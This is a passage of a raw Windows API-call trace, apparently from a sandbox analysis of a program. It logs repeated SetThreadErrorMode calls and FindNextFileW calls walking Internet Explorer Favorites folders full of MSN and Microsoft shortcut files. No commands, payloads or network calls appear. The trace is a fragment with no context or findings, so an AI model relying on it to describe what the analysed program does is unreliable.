(dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0250.215] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0250.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0250.217] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0250.226] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0250.228] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.233] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.233] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.233] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0250.234] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0250.234] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.234] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.234] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0250.234] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.235] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.235] FindNextFileW (in: 